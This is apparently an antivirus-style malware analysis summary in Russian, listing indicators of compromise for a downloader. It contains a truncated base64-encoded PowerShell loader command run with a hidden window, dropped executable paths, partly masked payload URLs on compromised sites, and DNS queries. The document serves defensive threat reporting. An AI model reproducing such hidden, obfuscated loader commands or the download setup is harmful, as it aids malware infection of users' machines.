Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABZAHQAbAAyAHMAawB0AD0AKAAnAEYAJwArACcAaQAnACsAKAAnAHcAdgBvACcAKwAnADkANQAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBzAEUAUgBwAFIATw...
- %HOMEPATH%\femi464\tt881nh\mqb8i9j.exe
- %HOMEPATH%\femi464\tt881nh\mqb8i9j.exe
- http://ca####renoperu.com/cgi-bin/w5e/
- http://ca####renoperu.com/cgi-sys/suspendedpage.cgi
- http://fa######hickenargentina.com/cgi-bin/wg/
- http://fa######hickenargentina.com/cgi-sys/suspendedpage.cgi
- http://ke###elidze.com/Documentation/GmfnfGm/
- http://fu###ovie1.co/wp-admin/dK/
- DNS ASK ve###twork.com
- DNS ASK ca####renoperu.com
- DNS ASK fa######hickenargentina.com
- DNS ASK du####e-partner.com
- DNS ASK ke###elidze.com
- DNS ASK fu###ovie1.co
- DNS ASK bj###ghuan.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABZAHQAbAAyAHMAawB0AD0AKAAnAEYAJwArACcAaQAnACsAKAAnAHcAdgBvACcAKwAnADkANQAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBzAEUAUgBwAFIATw...' (со скрытым окном)